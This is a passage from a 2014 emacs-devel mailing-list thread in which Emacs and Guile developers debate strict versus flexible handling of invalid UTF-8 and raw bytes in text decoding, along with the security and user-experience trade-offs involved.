network and process streams (which are different). Adding specification of the error handling convention will make the *user interface* yet more complicated -- and it has to be possible for all this to be done separately for every stream (you might trust files on your host but not the network). And then there's the "auto" coding system, which guesses the appropriate coding system by analyzing the input. I have always thought that the Emacs' developers emphasis on having Emacs "DWIM" so much in this area is somewhat misplaced[1], but that is the way things are and have been since the late 1980s (Emacs actually installed these features in 1998 or so, but there were patches that were universally used for Asian languages from the late 1980s), and there will be a lot of resistence from users and developers to any changes that require them to do things differently. Footnotes: [1] Historically, these features were developed by Japanese developers, who have to deal with an insane environment where even today you will encounter at least 5 major encodings on a daily basis (cheating a little, since UTF-16 is usually visible only inside MSFT file formats and in Java programming), and most of those have innumerable private variants (most large corporations in Japan have private sets of Chinese characters that are in Unicode but were historically not in the Japanese national standards). It's easy to see why Japanese would want a good guessing facility! Most of the rest of us either don't have to deal with it (95% of what we see is in one particular encoding), or have an extremely difficult problem in distinguishing the ones common in our environment (is this Latin-1 or Latin-9? vs. the Japanese case where the bit patterns of the major encodings are very distinctive). This is not to say that guessing is a bad idea where it can be done accurately, just that the Emacs facilities are way too complex for the benefit they provide over a much simpler system. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 1:35 ` Stephen J. Turnbull @ 2014-10-12 8:38 ` David Kastrup 2014-10-12 12:16 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-12 8:38 UTC (permalink / raw) To: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Mark H Weaver writes: > > Eli Zaretskii <eliz@gnu.org> writes: > > > > Specify, and then drag it all the way down the encoding/decoding > > > machinery. > > > > The strictness flag should conceptually be part of the encoding, and > > thus associated with the I/O port. > > This is the way Emacs works already. > > However, I think the Python system, where strictness is part of the > I/O port, not the encoding, and the encodings are designed to error > and then hand the invalid raw bytes to the error handler if desired, > is a better API. I don't know how easy it would be to provide this in > Emacs Emacs uses CCL programs for encoding/decoding. It would be a performance disaster for loading files with binary parts (like PostScript) to break out of the CCL program for every "invalid raw byte". I cannot believe this, really. We _fought_ all the Emacs 20 encoding wars decades ago. It looks like a bunch of armchair strategists trying to reinvent the wheel but these are actually people fundamentally involved with the original efforts. Which makes this doubly as baffling. Richard was _part_ of the Emacs 20 efforts and basically the one who forced the MULE issue, and Stephen was on the XEmacs side which now has ailed in popularity not least of all because Emacs tends to work better in practice _now_ regarding the current prevalence of multibyte codings in spite of XEmacs being earlier in aligning itself internally with utf-8 (If memory serves me right). I can understand GUILE developers being unaware of the experience we gained through all those years. But I am baffled at those who _led_ the respective efforts wanting to repeat history, persuaded that everything will be different next time round. Actually not even that: it would appear that our history and experience are not just treated as irrelevant but rather as non-existent. This thread is called "Emacs Lisp's future", but we seem determined to plan this future starting in 1994 rather than 2014. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 8:38 ` David Kastrup @ 2014-10-12 12:16 ` Stephen J. Turnbull 2014-10-12 12:34 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-12 12:16 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup writes: > Richard was _part_ of the Emacs 20 efforts and basically the one > who forced the MULE issue, and Stephen was on the XEmacs side which > now has ailed in popularity not least of all because Emacs tends to > work better in practice _now_ regarding the current prevalence of > multibyte codings in FWIW I don't recall it being a big deal, except for the noise you personally made about rawbytes support for AUCTeX (and correctly so, although we were unable to anything about it as quickly as we would have liked). > spite of XEmacs being earlier in aligning itself internally with > utf-8 (If memory serves me right). XEmacs introduced Mule earlier, and was the development platform for "UTF-2000" and later "Chise" XEmacs which did use UTF-8 internally, but according to Ben who was doing most of the work at that time, that code was unmaintainable and not adaptable for Windows so was not adopted in the mainline. XEmacs still uses Mule code internally. (It doesn't really matter except for convenience in the increasingly important case of Unicode being the external encoding, and potentially for access to externally developed software such as the UCD and ICU, or even PEP 393. The most important convenience is in design: Unicode has already dealt with most of the interesting issues in character sets.) > I can understand GUILE developers being unaware of the experience > we gained through all those years. But I am baffled at those who > _led_ the respective efforts wanting to repeat history, It's not a question of repeating history. History cannot be repeated, because Unicode has won. Mule is a niche feature, of rapidly decreasing importance. And history can't be repeated for another reason. Guile has no history of incorporating Mule features, or even Mule-enabling features. The question is whether Guile should adopt features designed in the 1990s for the 1990s environment (in *Japan*, the most snafued charset environment imaginable, I'll remind you) in order to better support Emacs, or whether Emacs should port existing support to Guile. The competition is severe, and there are many very strong alternatives for the use cases Guile would like to serve: Java, Python, Perl, and Ruby, and you can add PHP for web applications. Guile can't afford to acquire the kind of reputation that PHP had for carelessness in security matters. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 12:16 ` Stephen J. Turnbull @ 2014-10-12 12:34 ` David Kastrup 2014-10-12 14:49 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-12 12:34 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > The competition is severe, and there are many very strong alternatives > for the use cases Guile would like to serve: Java, Python, Perl, and > Ruby, and you can add PHP for web applications. Guile can't afford to > acquire the kind of reputation that PHP had for carelessness in > security matters. I don't buy the claims that the ability to faithfully represent arbitrary input in a consistent and reprodusible manner fully supported by all internal operations and kept unconfusable with other characters equals "carelessness in security". In fact, not being able to even _look_ at such material or have a representation for it seems like a much more severe shortcoming. Now you claim that you want such support but only if very explicitly requested, making it a second-class citizen. This set of priorities has left XEmacs without a round-trippable UTF-8 representation even to date. I've also already given an example of GUILE code that is unable to losslessly pass a string through a string port (the standard mechanism for _accumulating_ a string). Again, this is an outcome of the "let's cater primarily for good encodings" philosophy that is at the bottom of _many_ security problems. And of course a perfect vector for denial of service attacks. An engine that is not able without extra measures to reproduce its input is not going to win friends. And it's not like this is an actual security feature. What's next? Text processors that cut off lines after column 80 as a security feature? Because people might not see those characters, it is safer to remove them? -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 12:34 ` David Kastrup @ 2014-10-12 14:49 ` Stephen J. Turnbull 2014-10-12 16:50 ` David Kastrup ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-12 14:49 UTC (permalink / raw) To: David Kastrup; +Cc: emacs-devel David Kastrup writes: > I don't buy the claims that the ability to faithfully represent > arbitrary input in a consistent and reprodusible manner fully supported > by all internal operations and kept unconfusable with other characters > equals "carelessness in security". Good for you! I wouldn't either -- if any such claim had ever been made. > Now you claim that you want such support but only if very explicitly > requested, Yes, that is my own preference. I could easily be wrong for the general user, as I've been rolling handlers for broken encoding usage for 25 years. However, I've also seen the damage that can be done when a component of a system makes a virtue of transmitting everything verbatim, and believe it's best to start secure. > making it a second-class citizen. Non-default is *not* second-class. And if warranted, defaults can be changed. I just prefer starting with safe defaults. Although you personally may suffer due to the applications you work on, I suspect you will be surprised at the lack of outcry if you change the default judiciously, case by case. > I've also already given an example of GUILE code that is unable to > losslessly pass a string through a string port (the standard > mechanism for _accumulating_ a string). Presumably improving that situation is precisely why Mark is here. > Again, this is an outcome of the "let's cater primarily for good > encodings" philosophy that is at the bottom of _many_ security > problems. Sigh. It is *Emacs* that assumes the world is full of valid data, and happily shovels any hazmat it receives on to the next user or program without validation. And you're right, it *is* a security problem. Not just denial of service, either. You say that behavior is what Emacs users want, and maybe it is. Because most of the time the data is "nearly" valid and the defects are "insignificant", and hardly a security problem. It's the "worse is better" philosophy.[1] But the rest of the software development world is going in the opposite direction. "In God we trust. All others, present photo ID." Maybe they have figured something out? Heck, even Emacs is moving in the direction of defending *itself* from invalid data in other ways (thank you, Ted Z!) Footnotes: [1] Read Gabriel's essay of that title before taking that as an insult. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 14:49 ` Stephen J. Turnbull @ 2014-10-12 16:50 ` David Kastrup 2014-10-13 2:40 ` Mark H Weaver 2014-10-13 3:08 ` Richard Stallman 2014-10-13 3:41 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-12 16:50 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Sigh. It is *Emacs* that assumes the world is full of valid data, Nonsense. It would not need to _carefully_ _deal_ with data not fitting an encoding if it assumed that. It _carefully_ decodes non-representable data into a code page reserved for non-representable data. It will deal _properly_ with that data while it is under control of its strings (not upper/lowercasing it or mixing it up with other stuff) and will carefully repackage it when encoding it. As a consequence, it is easy to apply _any_ strategy to your data. If you want to clean out characters that are invalid for your application, any respective positive or negative character and coding ranges in a regexp pattern will carefully deal with it. > and happily shovels any hazmat it receives on to the next user or > program without validation. Emacs has no way to know what input is valid for the next user or program. An application programmed in Elisp may know, and it has _all_ the tools to deal _gracefully_ with it since Emacs' string processing will _not_ get confused by data it decoded itself and will preserve all information. > And you're right, it *is* a security problem. Not just denial of > service, either. You say that behavior is what Emacs users want, and > maybe it is. Because most of the time the data is "nearly" valid and > the defects are "insignificant", and hardly a security problem. It's > the "worse is better" philosophy.[1] No, it is the "clueless is useless" philosophy. Don't second-guess other systems. Do your job properly, regardless of what is thrown at you. Don't be the weakest chain in a link. Emacs cannot be a verification engine if it has no clue what it should be verifying. If you know what you want, you can get it. Regardless of what you want. libunistring (which is what GUILE currently uses for UTF-8 processing) has a _closed_ set of recovery strategies. As it stands, it is useless for implementing Emacs-like behavior because "encode invalid bytes into something libunistring can deal with transparently" is not part of its recovery strategies. Once you _have_ a useful encoding into the space of properly working strings, _any_ recovery strategy is easy to implement on top of that. For a platform, being forced to a closed set of behaviors is an extremely limiting choice. > But the rest of the software development world is going in the > opposite direction. "In God we trust. All others, present photo ID." > Maybe they have figured something out? Heck, even Emacs is moving in > the direction of defending *itself* from invalid data in other ways > (thank you, Ted Z!) You don't need to defend yourself from something you are equipped to deal with. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 16:50 ` David Kastrup @ 2014-10-13 2:40 ` Mark H Weaver 2014-10-13 4:49 ` Mark H Weaver 0 siblings, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-13 2:40 UTC (permalink / raw) To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel David Kastrup <dak@gnu.org> writes: > libunistring (which is what GUILE currently uses for UTF-8 processing) > has a _closed_ set of recovery strategies. As it stands, it is useless > for implementing Emacs-like behavior because "encode invalid bytes into > something libunistring can deal with transparently" is not part of its > recovery strategies. Once you _have_ a useful encoding into the space > of properly working strings, _any_ recovery strategy is easy to > implement on top of that. > > For a platform, being forced to a closed set of behaviors is an > extremely limiting choice. How many times do I have to repeat it? I agree we should provide an *option* for doing what you want. No matter how many times I say it, you keep pretending that I didn't say it, and spreading FUD about Guile "forcing" policies on applications. What you wrote above simply shows your ignorance of Guile. Yes, we use libunistring for some things, but we do _not_ use it for character encoding conversions. For that we use iconv, which gives us all the tools we need to provide Emacs-like behavior. Stop setting up strawmen and hacking away at them. I've got better things to do with my time than countering your endless stream of FUD, which by now has been featured on LWN. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 2:40 ` Mark H Weaver @ 2014-10-13 4:49 ` Mark H Weaver 0 siblings, 0 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-13 4:49 UTC (permalink / raw) To: David Kastrup; +Cc: Stephen J. Turnbull, emacs-devel I wrote: > What you wrote above simply shows your ignorance of Guile. Yes, we use > libunistring for some things, but we do _not_ use it for character > encoding conversions. For that we use iconv, which gives us all the > tools we need to provide Emacs-like behavior. It turns out I was partially mistaken. We use iconv in some places and libunistring in some others. Anyway, it seems that I have lost my temper with David, which is embarrassing. I'd best drop out of this conversation now. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 14:49 ` Stephen J. Turnbull 2014-10-12 16:50 ` David Kastrup @ 2014-10-13 3:08 ` Richard Stallman 2014-10-13 4:50 ` Stephen J. Turnbull 2014-10-13 3:41 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:08 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Sigh. It is *Emacs* that assumes the world is full of valid data, and happily shovels any hazmat it receives on to the next user or program without validation. And you're right, it *is* a security problem. It is not much of a security problem in Emacs. The defaults for the standard Guile primitives could be strict, and the defaults for some Emacs Lisp functions could be flexible. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 3:08 ` Richard Stallman @ 2014-10-13 4:50 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 4:50 UTC (permalink / raw) To: rms; +Cc: dak, emacs-devel Richard Stallman writes: > The defaults for the standard Guile primitives could be strict, > and the defaults for some Emacs Lisp functions could be flexible. Which is precisely what I proposed from the beginning[1], and as I understand his posts, it is what Mark has had in mind throughout as well. Speaking *only* for myself, I would *prefer* defaults for text coding set by Emacs to be strict, and I believe that is both in the average user's interest and not too inconvenient *in today's environment*.[2] But it should be easy for applications and modes to say to Emacs "do what you would have done in Emacs 24" and "do what you would have done in Emacs 24 *except* apply a strict(er) error handling on invalid encoding". Experience may show that my preferred default is too strict for Emacs, even today, but I believe it is the place to start. FWIW IMHO YMMV Footnotes: [1] Although my expression of that proposal seems to have been unintelligible. Sorry! [2] tl;dr UTF-8 is rapidly becoming the preferred encoding for many natural languages, although China encourages GB18030 by law and Japan and Russia both maintain their historical Babel of encodings. Protocols are both becoming stricter about validation, and using the sensible default of UTF-8. Internet protocols, where security is a very important aspect, are gradually shifting from insisting on ASCII to defaulting to UTF-8 (although often in some kind of "ASCII-armored" encoding such as BASE64 or punycode). So in general, with a few application-specific exceptions (hello, AUCTeX), both users and applications should encounter far fewer instances of broken encoding than in the era when the experiments Eli and David refer to were conducted. This is somewhat supported by the fact that at least one major dynamic language (Python) doesn't even provide an encoding detection function in its standard library. The typical range of use cases is different, granted, but editing applications (the IDLE IDE and the IPython "notebook" facility) don't seem to have issues with defaulting to "strict". ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 14:49 ` Stephen J. Turnbull 2014-10-12 16:50 ` David Kastrup 2014-10-13 3:08 ` Richard Stallman @ 2014-10-13 3:41 ` Richard Stallman 2 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:41 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Sigh. It is *Emacs* that assumes the world is full of valid data, and happily shovels any hazmat it receives on to the next user or program without validation. And you're right, it *is* a security problem. It is not much of a security problem in Emacs. The defaults for the standard Guile primitives could be strict, and the defaults for some Emacs Lisp functions could be flexible. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 23:51 ` Mark H Weaver 2014-10-12 1:35 ` Stephen J. Turnbull @ 2014-10-12 5:37 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-12 5:37 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen > From: Mark H Weaver <mhw@netris.org> > Cc: rms@gnu.org, dak@gnu.org, dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, stephen@xemacs.org > Date: Sat, 11 Oct 2014 19:51:45 -0400 > > Eli Zaretskii <eliz@gnu.org> writes: > > >> No, it's just a matter of setting some parameter to specify a particular > >> decision in decoding or encoding behavior. > > > > Specify, and then drag it all the way down the encoding/decoding > > machinery. > > The strictness flag should conceptually be part of the encoding, and > thus associated with the I/O port. This would obviate the need to > propagate it down through layers of code. We are talking about 2 different meanings of "propagate". I was talking about the need for the code at all levels to know about this bit and "handle" it, like we do now with the different kinds of "source" and "destination" of the encoding/decoding process. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 7:18 ` Eli Zaretskii 2014-10-11 23:51 ` Mark H Weaver @ 2014-10-12 3:24 ` Richard Stallman 2014-10-12 5:47 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-12 3:24 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > No, it's just a matter of setting some parameter to specify a particular > decision in decoding or encoding behavior. Specify, and then drag it all the way down the encoding/decoding machinery. Could you be more concrete about the problem you are talking about here? > It will be easy to specify one or the other, so why not make the default > be strict, except in the primitives that operate on files? Because I believe this will annoy users and cause a lot of complaining. Would you please describe a concrete scenario in which this might annoy users? Assume that any operation which decodes text _for a user to see_ will specify flexible decoding. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 3:24 ` Richard Stallman @ 2014-10-12 5:47 ` Eli Zaretskii 2014-10-13 3:07 ` Richard Stallman 2014-10-13 3:38 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-12 5:47 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Sat, 11 Oct 2014 23:24:03 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > > No, it's just a matter of setting some parameter to specify a particular > > decision in decoding or encoding behavior. > > Specify, and then drag it all the way down the encoding/decoding > machinery. > > Could you be more concrete about the problem you are talking about here? The need to know about the semantics of this parameter all the way through the multi-layered hierarchy of our encoding/decoding implementation. > > It will be easy to specify one or the other, so why not make the default > > be strict, except in the primitives that operate on files? > > Because I believe this will annoy users and cause a lot of > complaining. > > Would you please describe a concrete scenario in which this might > annoy users? I already did, at least twice. I have no more scenarios to contribute, sorry. > Assume that any operation which decodes text _for a user to see_ > will specify flexible decoding. That means almost all of them, more-or-less. So it goes against what AFAIU Mark had in mind with "struct UTF-8". ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:47 ` Eli Zaretskii @ 2014-10-13 3:07 ` Richard Stallman 2014-10-13 3:38 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:07 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Assume that any operation which decodes text _for a user to see_ > will specify flexible decoding. That means almost all of them, more-or-less. So it goes against what AFAIU Mark had in mind with "struct UTF-8". I don't think so. I think he is talking about operations OTHER THAN those that decode text to put it in a buffer and show it to a user. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:47 ` Eli Zaretskii 2014-10-13 3:07 ` Richard Stallman @ 2014-10-13 3:38 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:38 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Assume that any operation which decodes text _for a user to see_ > will specify flexible decoding. That means almost all of them, more-or-less. So it goes against what AFAIU Mark had in mind with "struct UTF-8". I don't think so. I think he is talking about operations OTHER THAN those that decode text to put it in a buffer and show it to a user. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:21 ` Eli Zaretskii 2014-10-09 7:52 ` David Kastrup 2014-10-10 14:24 ` Richard Stallman @ 2014-10-10 14:24 ` Richard Stallman 2014-10-10 15:38 ` Eli Zaretskii [not found] ` <<83r3yg9bpu.fsf@gnu.org> 2 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:24 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > Asking about invalid UTF-8 in a file could be a nuisance, but how much > of a nuisance depends on the details of what we do. Since this has > some security implications, it is worth a small amount of nuisance. That wasn't what users felt, overwhelmingly. Felt when? About what behavior? I asked > What exactly did we try before? and you responded AFAIR, we tried converting raw bytes into valid non-ASCII characters, and perhaps also replacing them with the equivalent of u+FFFD, the Unicode "replacement character". But those are both different from the proposal I'm discussing. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 14:24 ` Richard Stallman @ 2014-10-10 15:38 ` Eli Zaretskii 2014-10-11 1:17 ` Richard Stallman [not found] ` <<83r3yg9bpu.fsf@gnu.org> 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-10 15:38 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Fri, 10 Oct 2014 10:24:37 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > > Asking about invalid UTF-8 in a file could be a nuisance, but how much > > of a nuisance depends on the details of what we do. Since this has > > some security implications, it is worth a small amount of nuisance. > > That wasn't what users felt, overwhelmingly. > > Felt when? When we tried to be more cautious about these issues than we are now. > About what behavior? There are several examples, and I'm not sure I recall all the details accurately. One such situation goes like this: Visit a file (or receive from another process text) that is encoded in Latin-1. Insert some text that cannot be encoded in Latin-1, and try saving the buffer (or sending it to a process). Originally, Emacs would complain that Latin-1 cannot be used, and asked the user to select a different encoding. Then users of UTF-8 locales complained that these prompts were annoyances, that they expect Emacs to use UTF-8 silently, without any questions, as long as UTF-8 can encode the result. So now that is what we do. > I asked > > > What exactly did we try before? > > and you responded > > AFAIR, we tried converting raw bytes into valid non-ASCII characters, > and perhaps also replacing them with the equivalent of u+FFFD, the > Unicode "replacement character". > > But those are both different from the proposal I'm discussing. How are they different? In any case, I hope you are not expecting to hear about user reactions to any of the proposals that haven't been tried yet. Such expectations are IMO unreasonable. What I (and I think also David) were trying to show is that _similar_ situations were met with user complaints and outcry, and that we are where we are today because we heeded to those complaints. I see no reason to believe that user reaction to the proposals being brought up here will be any different, just because we tell them "it's about their security" and "trust us, we know better". Of course, one can reject the analogies and claim that "this is different" and/or "this time the reaction will be different", and there's nothing I could produce as counter-argument to that except gut feelings based on our previous experience. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 15:38 ` Eli Zaretskii @ 2014-10-11 1:17 ` Richard Stallman 2014-10-11 7:23 ` David Kastrup 2014-10-11 7:33 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-11 1:17 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Originally, Emacs would complain that Latin-1 cannot be used, and asked the user to select a different encoding. That is about Latin-1. What did Emacs do, at that time, with UTF-8? Then users of UTF-8 locales complained that these prompts were annoyances, that they expect Emacs to use UTF-8 silently, without any questions, as long as UTF-8 can encode the result. It is not clear what "As long as UTF-8 can encode the result" means, concretely. Whether Emacs's UTF-8 encoding can encode the raw bytes is a matter of our decision. Strictly speaking, UTF-8 can't encode the raw bytes. Thus, it seems that asking for confirmation before writing raw bytes in UTF-8 is consistent with that expectation, and writing the raw bytes without asking for confirmation is also consistent with that. I am not trying to play word games with you. I think you probably had a more specific point in mind, but you need to present it clearly. > > What exactly did we try before? > > and you responded > > AFAIR, we tried converting raw bytes into valid non-ASCII characters, > and perhaps also replacing them with the equivalent of u+FFFD, the > Unicode "replacement character". > > But those are both different from the proposal I'm discussing. How are they different? The first of them was to convert the raw bytes into valid non-ASCII characters. (When? When reading the file? When writing the file?) You have not described that behavior clearly, but either way it is not the same as the proposal we are discussing now. This proposal is to ask for confirmation before encoding a file with raw bytes. The second was to "replace" these codes with something else. (When? When reading the file? When writing the file?) Either way it is not the same as the proposal we are discussing now. This proposal does not replace any characters. In any case, I hope you are not expecting to hear about user reactions to any of the proposals that haven't been tried yet. That idea did not come from me. YOU said they had already reacted to THIS proposal. What I (and I think also David) were trying to show is that _similar_ situations were met with user complaints and outcry, and that we are where we are today because we heeded to those complaints. There are many ways for two different designs to be "similar". They are also different. The details are crucial for users' reactions. I think the people who objected to those behaviors, which involved changing the file contents, might not mind the confirmation much. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 1:17 ` Richard Stallman @ 2014-10-11 7:23 ` David Kastrup 2014-10-11 7:33 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-11 7:23 UTC (permalink / raw) To: Richard Stallman Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii, stephen Richard Stallman <rms@gnu.org> writes: > There are many ways for two different designs to be "similar". They > are also different. The details are crucial for users' reactions. I > think the people who objected to those behaviors, which involved > changing the file contents, might not mind the confirmation much. That kind of choice would require the assumption that any file operation (and any other encoding/decoding action) is an immediate, direct, and obvious consequence of a user interaction with Emacs. That is not the case, and it has never been. And even where it is the case, there is nothing to be gained by letting Emacs refuse viewing files. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-11 1:17 ` Richard Stallman 2014-10-11 7:23 ` David Kastrup @ 2014-10-11 7:33 ` Eli Zaretskii 2014-10-12 3:22 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-11 7:33 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Fri, 10 Oct 2014 21:17:15 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > stephen@xemacs.org > > Originally, Emacs would complain that Latin-1 cannot be used, and > asked the user to select a different encoding. > > That is about Latin-1. What did Emacs do, at that time, with UTF-8? The situation I described is with text encodable by UTF-8, but not by Latin-1. So it has no analogue when UTF-8 is used to begin with. > Then users of UTF-8 > locales complained that these prompts were annoyances, that they > expect Emacs to use UTF-8 silently, without any questions, as long as > UTF-8 can encode the result. > > It is not clear what "As long as UTF-8 can encode the result" means, > concretely. Whether Emacs's UTF-8 encoding can encode the raw bytes > is a matter of our decision. Strictly speaking, UTF-8 can't encode > the raw bytes. I wasn't talking about raw bytes, I was talking about characters outside of Latin-1 charset, like Cyrillic or Polish. > > > What exactly did we try before? > > > > and you responded > > > > AFAIR, we tried converting raw bytes into valid non-ASCII characters, > > and perhaps also replacing them with the equivalent of u+FFFD, the > > Unicode "replacement character". > > > > But those are both different from the proposal I'm discussing. > > How are they different? > > The first of them was to convert the raw bytes into valid non-ASCII characters. > (When? When reading the file? When writing the file?) You have not > described that behavior clearly, but either way it is not the same as > the proposal we are discussing now. This proposal is to ask for > confirmation before encoding a file with raw bytes. 